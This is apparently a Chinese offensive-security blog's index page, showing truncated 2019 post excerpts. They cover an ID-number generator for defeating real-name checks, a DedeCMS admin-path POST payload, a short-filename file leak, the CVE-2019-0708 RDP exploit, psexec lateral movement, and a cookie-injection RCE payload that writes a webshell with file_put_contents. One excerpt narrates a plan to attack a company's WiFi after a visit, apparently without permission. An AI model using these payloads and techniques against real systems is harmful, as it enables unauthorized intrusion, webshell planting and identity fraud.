jasonx's Blog

jasonx 2019/10/20 2755 1

前言：该软件可以用来生成身份证号码，用于测试授权的业务漏洞，测试实名验证等等...软件截图下载地址免责声明：请勿用于非法用途，否则一切后果自负，与作者无关。https://www.lanzous.com/i6v0l0d

jasonx 2019/09/12 1386 0

前言关于dedecms找后台，方法有很多。针对windows系统，可以通过post以下数据来判断。PAYLOADurl/index.php data dopost=save&_FILES[b4dboy][tmp_name]=./爆破参数</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILE...

jasonx 2019/09/12 1849 0

前言其实不止dedecms可以用这种方法爆出敏感信息，只要对方是windows服务器，并且存在短文件名漏洞，就可以通过这种方法爆破出敏感信息。原理DEDECMS 默认备份数据库的文件夹是；/data/backupdata/管理员数据表的文件名称是；dede_admin_0_e9e8e2bf84ff3901.txt 文件名的前面字符串固定，后面的字符串是随机产生的。那么利用短文件名漏洞特性，已知文件名前6位，直接输入dede_a~1...

jasonx 2019/09/10 2690 0

前言Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广，windows2003、windows2008、windows2008 R2、windows xp、win7等系统都会遭到攻击，该服务器漏洞利用方式是通过远程桌面端口RDP协议进行攻击。9月7日 号称比肩MS17-010漏洞(CVE-2019-0708)的利用EXP被公开。Metasploit在推特上发布了漏洞利用视频和exp。目前各位大佬和安...

jasonx 2019/07/24 2856 1

前言我本人在内网渗透中，经常会用到PSTools。在内网中很多win7电脑，知道对方密码但无法直接远程登录的情况下，psexec的优势就体现出来了。psexec.exepsexec.exe是一个远程执行工具，知道对方账号密码即可远程执行命令，运行程序等等。常用参数说明-u 输入对方用户名-p 输入对方密码-d 无需等待程序执行完，直接返回。-s 以system权限运行-i 让对方看到你运行的程序窗口-c 运行对方电脑里...

jasonx 2019/07/17 3854 1

代码执行访问127.0.0.1/home.php，访问其他文件也可以。cookie字段中会出现xxxx_xxxx_language字段，根本原因就是这个字段存在注入，导致的RCE抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().' getshell%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%...

jasonx 2019/07/12 1484 2

前言：故事发生在前两天，我们去参观工业园区内一家电商公司。去参观他们公司的时候，我说要用下无线网，他们技术说密码就是他们的网站域名，我一脸懵逼表示我不知道域名，然后对方接过我手机给我连上了他们wifi。然后就有了后面的故事。0x01 邪恶的想法在回来的时候，我注意到，他们公司在二楼，在楼下wifi信号也还好，然后我心中萌生了一个邪恶的想法。(๑◡๑)为了掩人耳目，我回公司带上我笔记本开车再次来到他们楼下（在一个园区里很近）熄火后我...